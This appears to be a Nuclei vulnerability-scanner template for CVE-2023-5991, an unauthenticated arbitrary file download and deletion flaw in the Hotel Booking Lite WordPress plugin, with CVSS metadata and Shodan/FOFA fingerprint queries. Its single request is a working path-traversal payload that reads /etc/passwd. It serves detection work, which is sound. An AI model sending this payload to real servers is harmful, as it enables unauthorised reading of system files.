id: CVE-2023-5991 info: name: Hotel Booking Lite < 4.8.5 - Arbitrary File Download & Deletion author: s4e-io severity: critical description: | The Hotel Booking Lite WordPress plugin before 4.8.5 does not validate file paths provided via user input, as well as does not have proper CSRF and authorisation checks, allowing unauthenticated users to download and delete arbitrary files on the server impact: | Unauthenticated attackers can exploit missing validation and authorization checks to download and delete arbitrary files on WordPress servers running Hotel Booking Lite. remediation: Fixed in 4.8.5 reference: - https://wpscan.com/vulnerability/e9d35e36-1e60-4483-b8b3-5cbf08fcd49e/ - https://nvd.nist.gov/vuln/detail/CVE-2023-5991 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-5991 cwe-id: CWE-22 epss-score: 0.78319 epss-percentile: 0.99053 cpe: cpe:2.3:a:motopress:hotel_booking_lite:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: motopress product: hotel_booking_lite framework: wordpress shodan-query: http.html:/wp-content/plugins/motopress-hotel-booking fofa-query: body=/wp-content/plugins/motopress-hotel-booking publicwww-query: "/wp-content/plugins/motopress-hotel-booking" tags: cve,cve2023,lfi,motopress-hotel-booking,wordpress,wp-plugin,wpscan,wp,motopress,vuln http: - method: GET path: - "{{BaseURL}}/?filename=../../../../../../etc/passwd&mphb_action=download" matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - type: word part: header words: - "filename=" - "/etc/passwd" condition: and - type: status status: - 200 # digest: 490a00463044022015d42fc0ca3c33a787e53ebe304332e1597ffafe6894400bf75b77fd7e11dab202205d52224fcc2b82a2ae2b59f4eab0495c3d0823d81ea4f2bc2ee8ff364f04b6cb:922c64590222798bb761d5b6d8e72950